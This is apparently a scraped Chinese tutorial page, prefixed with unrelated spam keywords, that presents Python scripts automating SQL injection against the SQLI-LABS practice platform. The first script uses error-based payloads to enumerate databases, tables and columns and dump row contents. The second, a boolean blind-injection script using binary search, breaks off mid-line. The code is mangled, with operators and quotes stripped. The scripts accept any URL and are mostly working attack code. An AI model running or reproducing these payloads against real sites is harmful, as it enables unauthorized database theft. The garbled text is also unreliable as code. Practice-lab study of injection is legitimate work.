免费建个人网站步骤,wordpress ios7,wordpress 森林,18款禁用网站app全部通过前面payload的构造#xff0c;不难发现#xff0c;对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些payload语句虽然复杂#xff0c;但大部分内容都是相同的#xff0c;因此#xff0c;一言不合就写了个脚本自动化注入#xff0c;坐等信息爆出的感…通过前面payload的构造不难发现对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些payload语句虽然复杂但大部分内容都是相同的因此一言不合就写了个脚本自动化注入坐等信息爆出的感觉–我就静静看着不说话_以下两个python脚本仅适用于SQLI-LABS在其他平台使用还需要做少许改动~~~*** SQLI-LABS 是一个专业的SQL注入练习平台**基于报错型注入的自动化脚本(sqli-labs-master/Less-5/)#!/usr/bin/env python#codingutf-8import sysimport requestsimport reimport binascii#sys.argv[1]# --dbs url# --tables -D database url# --columns -T tablename -D database url# --dump -C columnname -T tablename -D database urldef http_get(url):# proxies {http: http://127.0.0.1:8080}#return requests.get(dbs_num_url, proxiesproxies)return requests.get(url)def getAllDatabases(url):dbs_num_url url and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distincttable_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- resp http_get(dbs_num_url)html resp.content#print html# ~~:~~4~~:~~dbs_num int(re.search(r~~:~~(d*?)~~:~~, html).group(1))print (u数据库数量: %d % dbs_num)dbs []print (u数据库名: )for index in xrange(0,dbs_num):db_name_url url and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- % indexhtml http_get(db_name_url).contentdb_name re.search(r~~:~~(.*?)~~:~~, html).group(1)dbs.append(db_name)print (t%s % db_name)def getAllTablesByDb(url, db_name):db_name_hex 0x binascii.b2a_hex(db_name)tables_num_url url and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, count(table_name), 0x7e7e3a7e7e) from information_schema.tables where table_schema%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- % db_name_hexhtml http_get(tables_num_url).contenttables_num int(re.search(r~~:~~(d*?)~~:~~, html).group(1))print (u%s 库中表的数量: %d % (db_name, tables_num))print (u表名: )for index in xrange(0,tables_num):tables_name_url url and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, table_name, 0x7e7e3a7e7e) from information_schema.tables where table_schema%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- % (db_name_hex, index)html http_get(tables_name_url).contenttable_name re.search(r~~:~~(.*?)~~:~~, html).group(1)print (t%s % table_name)def getAllColumnsByTable(url, db_name,tab_name):db_name_hex 0x binascii.b2a_hex(db_name)tab_name_hex 0x binascii.b2a_hex(tab_name)column_num_url url and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(column_name) from information_schema.columns where table_schema%s and table_name%s),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) -- % (db_name_hex,tab_name_hex)html http_get(column_num_url).contentcolumn_num int(re.search(r::(d*?)::, html).group(1))print (u%s 表中字段的数量: %d % (tab_name, column_num))print (u列名)for index in xrange(0,column_num):tables_name_url url and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema%s and table_name%s limit %d,1),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) -- % (db_name_hex,tab_name_hex,index)html http_get(tables_name_url).contentcolumn_name re.search(r::(.*?)::, html).group(1)print (t%s % column_name)passdef getAllContent(url, db_name, tab_name, col_name,):# db_name_hex 0x binascii.b2a_hex(db_name)# tab_name_hex 0x binascii.b2a_hex(tab_name)# col_name binascii.b2a_hex(col_name)# col re.split(,,col_name) #分割参数:字段名# le len(col)content_num_url url and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(*) from %s.%s),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a)s) -- % (db_name,tab_name)html http_get(content_num_url).contentcol_name_re col_name.replace(,,,0x09,)content_num int(re.search(r::(d*?)::, html).group(1))print %s 表中行数为: %d % (tab_name, content_num)for index in xrange(0,content_num):content_name_url url and (select 1 from (select count(*),concat((select concat(0x3a,0x3a,%s,0x3a,0x3a) from %s.%s limit %d,1), floor(rand(0)*2)) a from information_schema.columns group by a)s) -- % (col_name_re,db_name,tab_name,index)html http_get(content_name_url).content# print htmlssscontent_name re.search(r::(.*?)::, html).group(1)print t%s % content_namedef main():if sys.argv[1] --dbs:getAllDatabases(sys.argv[2])elif sys.argv[1] --tables:getAllTablesByDb(sys.argv[4], sys.argv[3])elif sys.argv[1] --columns:# print sys.argv[6],sys.argv[5],sys.argv[3]getAllColumnsByTable(sys.argv[6],sys.argv[5],sys.argv[3])passelif sys.argv[1] --dump:getAllContent(sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3])# print sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3]passelse:print (u我不懂你的参数!)if __name__ __main__:main()基于bool型注入(sql盲注)的自动化脚本(sqli-labs-master/Less-8/)#!/usr/bin/env python#codingutf-8import sysimport requestsimport reimport binascii#sys.argv[1]# --dbs url# --tables url -D database# --columns url -D database -T tablename# --dump url -D database -T tablename -C columnnamedef http_get(url):return requests.get(url)passdef dichotomy(sql): #二分法left 1right 500while 1:mid (left right)/2# print midif mid left:return midbreakdb_count_url sql %d)-- % mid# print db_count_urlhtml http_get(db_count_url).content# print htmlsearch_flag re.search(You are in, html)if search_flag:right mid# print right: str(right)else:left mid# print left: str(left)def getAllDabatases(url):search_db_num url and ((select count(schema_name) from information_schema.schemata)文章来源于互联网如有雷同请联系站长删除三、基于报错型注入和sql盲注的自动化实现
